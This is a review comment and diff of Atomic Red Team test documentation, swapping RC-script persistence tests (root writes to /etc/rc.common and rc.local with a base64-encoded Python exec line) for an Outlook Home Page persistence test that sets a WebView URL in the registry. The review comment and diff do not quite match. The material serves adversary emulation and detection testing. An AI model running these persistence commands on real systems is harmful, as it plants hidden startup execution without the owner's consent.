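Review bot: the description for Atomic Test #2 and #3 is just `Modify rc.common` / `Modify rc.local`, which tells the operator neither what the test leaves behind nor how to confirm it ran. The base64 string decodes to a Python one-liner that writes `/tmp/T1037.004.rc.common` (respectively `/tmp/T1037.004.rc.local`) through `os.popen`, and that only happens on the next boot, not when the attack command itself is executed. State the marker path and the reboot requirement in the description, and consider putting the marker-writing command into the script in clear text so a reader of the generated markdown can see what the persistence entry executes without decoding it.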
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 5e258a38..858ef875 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -1,105 +1,45 @@ -# T1037.004 - RC Scripts -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) -
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. +# T1137.004 - Outlook Home Page +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) +
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) -Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. - -Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) - -Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
+Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) +
## Atomic Tests -- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) - -- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) - -- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal) +- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence)
-## Atomic Test #1 - rc.common -Modify rc.common +## Atomic Test #1 - Install Outlook Home Page Persistence +This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. -[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) +Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). -**Supported Platforms:** macOS +**Supported Platforms:** Windows - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| +| outlook_version | Version of Outlook that is installed | string | 16.0| +| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| -```bash -sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common -``` +#### Attack Commands: Run with `command_prompt`! - - - - -
-
- -## Atomic Test #2 - rc.common -Modify rc.common - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi -printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common -printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common -sudo chmod +x /etc/rc.common +```cmd +reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f ``` #### Cleanup Commands: -```bash -origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -``` - - - - - -
-
- -## Atomic Test #3 - rc.local -Modify rc.local - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi -printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local -printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local -sudo chmod +x /etc/rc.local -``` - -#### Cleanup Commands: -```bash -origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi +```cmd +reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f ```